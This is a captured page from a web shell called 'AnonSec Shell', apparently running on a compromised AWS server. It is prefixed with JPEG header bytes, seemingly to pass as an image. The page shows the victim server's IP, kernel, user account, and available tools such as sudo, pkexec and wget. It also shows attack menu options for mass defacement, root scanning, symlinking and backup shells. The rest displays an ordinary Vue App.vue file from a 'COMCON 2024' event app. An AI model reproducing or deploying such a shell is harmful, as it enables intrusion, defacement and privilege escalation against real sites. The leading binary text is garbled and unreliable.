JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 104.21.79.64  /  Your IP : 104.23.243.116   [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/app/comcon24/pwa/src/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/app/comcon24/pwa/src/App.vue
<template>
  <div id="app">
    <div class="container-fluid p-0">
      <router-view />
    </div>

    <notifications position="center top">
      <template slot="body" slot-scope="props">
        <div class="d-flex align-items-center gap-8 justify-content-between">
          <div class="d-flex gap-8">
            <img
              src="/svg/icon-info-white.svg"
              alt=""
              class="align-self-start"
              style="margin-top: 4px"
            />
            <div>
              <p class="mb-0 f-14">
                <b>{{ props.item.title }}</b>
              </p>
              <p class="mb-0 f-12">{{ props.item.text }}</p>
            </div>
          </div>
          <b-icon-x class="f-20 align-self-start" @click="props.close"></b-icon-x>
        </div>
      </template>
    </notifications>

    <NotificationPrompt />
  </div>
</template>
<script>
import CheckInSuccessModal from "@/components/modal/completed-mission/CheckInSuccessModal.vue";
import CaptureMomentSuccessModal from "@/components/modal/completed-mission/CaptureMomentSuccessModal.vue";
import AskQuestionSuccessModal from "@/components/modal/completed-mission/AskQuestionSuccessModal.vue";
import Cookies from "js-cookie";
import NotificationPrompt from "@components/NotificationPrompt.vue";

export default {
  components: {
    CheckInSuccessModal,
    CaptureMomentSuccessModal,
    AskQuestionSuccessModal,
    NotificationPrompt,
  },
  metaInfo() {
    return {
      htmlAttrs: { lang: "id" },
      title: "COMCON 2024",
      meta: [
        { charset: "utf-8" },
        {
          name: "viewport",
          content: "width=device-width, initial-scale=1.0, user-scalable=no, maximum-scale=1.0",
        },
        {
          vmid: "description",
          name: "description",
          content: "",
        },
        {
          vmid: "keywords",
          name: "keywords",
          content: "",
        },
        {
          name: "robots",
          content: "noindex, nofollow",
        },
      ],
      link: [
        { rel: "preconnect", href: "https://fonts.gstatic.com" },
        {
          rel: "preload",
          href: "https://fonts.googleapis.com/css2?family=DM+Sans:wght@400;500;700&display=swap",
          as: "style",
        },
        {
          rel: "stylesheet",
          href: "https://cdn.jsdelivr.net/npm/bootstrap-icons@1.5.0/font/bootstrap-icons.css",
        },
        {
          rel: "preload",
          href: "https://fonts.googleapis.com/css2?family=Barlow+Condensed:wght@400;600;700&display=swap",
          as: "style",
        },
        {
          rel: "stylesheet",
          href: "https://fonts.googleapis.com/css2?family=DM+Sans:wght@400;500;700&display=swap",
        },
        {
          rel: "stylesheet",
          href: "https://fonts.googleapis.com/css2?family=Barlow+Condensed:wght@400;600;700&display=swap",
        },
        {
          rel: "stylesheet",
          href: "https://fonts.googleapis.com/css2?family=Kanit:wght@400;500;600;700&display=swap",
        },
        {
          hid: "canonical",
          rel: "canonical",
          href: `${location.origin}${this.$route.path}`,
        },
      ],
      script: [
        {
          innerHTML: "function OptanonWrapper() {}",
          body: true,
        },
      ].filter(Boolean),
      noscript: [],
      __dangerouslyDisableSanitizersByTagID: {
        ga: ["innerHTML"],
        gtag: ["innerHTML"],
        gtm: ["innerHTML"],
        gtmNoscript: ["innerHTML"],
      },
    };
  },
  computed: {
    missionStatus: function () {
      return this.$store.state.mission.status;
    },
  },
  data() {
    return {
      checkInData: {
        session: null,
        point: null,
        position: null,
      },
    };
  },
  methods: {
    async getMissionStatus() {
      await this.$store.dispatch("mission/getStatus").then((res) => {
        const missionStatusCookies = Cookies.get("missionStatus");
        const activities = [];

        if (missionStatusCookies) {
          const parsedMissionStatusCookies = JSON.parse(missionStatusCookies);
          // if (parsedMissionStatusCookies.quizDayOne != this.missionStatus.quizDayOne && this.missionStatus.quizDayOne === true) {
          //   activities.push('Quiz: Day 1');
          // }
          // if (parsedMissionStatusCookies.quizDayTwo != this.missionStatus.quizDayTwo && this.missionStatus.quizDayTwo === true) {
          //   activities.push('Quiz: Day 2');
          // }
          // if (parsedMissionStatusCookies.profilePic != this.missionStatus.profilePic && this.missionStatus.profilePic === true) {
          //   activities.push('Add Profile Picture');
          // }
          // if (parsedMissionStatusCookies.captureMoment != this.missionStatus.captureMoment && this.missionStatus.captureMoment === true) {
          //   activities.push('Post a Moments');
          // }
          // if (parsedMissionStatusCookies.askQuestion != this.missionStatus.askQuestion && this.missionStatus.askQuestion === true) {
          //   activities.push('Ask Questions');
          // }
          // if (parsedMissionStatusCookies.firstLogin != this.missionStatus.firstLogin && this.missionStatus.firstLogin === true) {
          //   activities.push('First Login');
          // }
          // if (parsedMissionStatusCookies.tennis != this.missionStatus.tennis && this.missionStatus.tennis === true) {
          //   activities.push('Play Tennis');
          // }
          // if (parsedMissionStatusCookies.yoga != this.missionStatus.yoga && this.missionStatus.yoga === true) {
          //   activities.push('Join Yoga');
          // }
          // if (parsedMissionStatusCookies.swimming != this.missionStatus.swimming && this.missionStatus.swimming === true) {
          //   activities.push('Join Swimming');
          // }
          // if (parsedMissionStatusCookies.volleyball != this.missionStatus.volleyball && this.missionStatus.volleyball === true) {
          //   activities.push('Play Beach Volleyball');
          // }
          // if (parsedMissionStatusCookies.jogging != this.missionStatus.jogging && this.missionStatus.jogging === true) {
          //   activities.push('Join Jogging');
          // }
          // if (parsedMissionStatusCookies.gym != this.missionStatus.gym && this.missionStatus.gym === true) {
          //   activities.push('Join Gym');
          // }
        }
        Cookies.set("missionStatus", JSON.stringify(res.data));

        // activities.forEach(elm => {
        //   this.$notify({
        //     title: elm,
        //     text: 'Congratulations, You’ve completed this mission.',
        //   });
        // });
      });
    },
    async getProfile() {
      await this.$store.dispatch("auth/getProfile");
    },
    async getNotification() {
      await this.$store.dispatch("notification/get");
    },
    async getSetting() {
      await this.$store.dispatch("setting/getSetting");
    },
  },
  watch: {
    "$route.path": function () {
      if (this.$route.meta?.requiresAuth === true) {
        // this.getMissionStatus();
        // this.getProfile();
        this.getNotification();
        this.getSetting();
      }
    },
  },
  created() {
    this.sockets.subscribe("onSettingUpdatedChallenge", async () => {
      await this.getSetting();
      if (
        ["/br/challenge", "/br/feed", "/br/qna"].includes(this.$route.path) &&
        !this.$store.state.setting.status.CHALLENGE
      ) {
        this.$router.push("/br");
        setTimeout(() => {
          this.$notify({
            title: "Coming Soon!",
            text: "This feature will be available soon.",
          });
        }, 200);
      }
    });
  },
};
</script>

Anon7 - 2022
AnonSec Team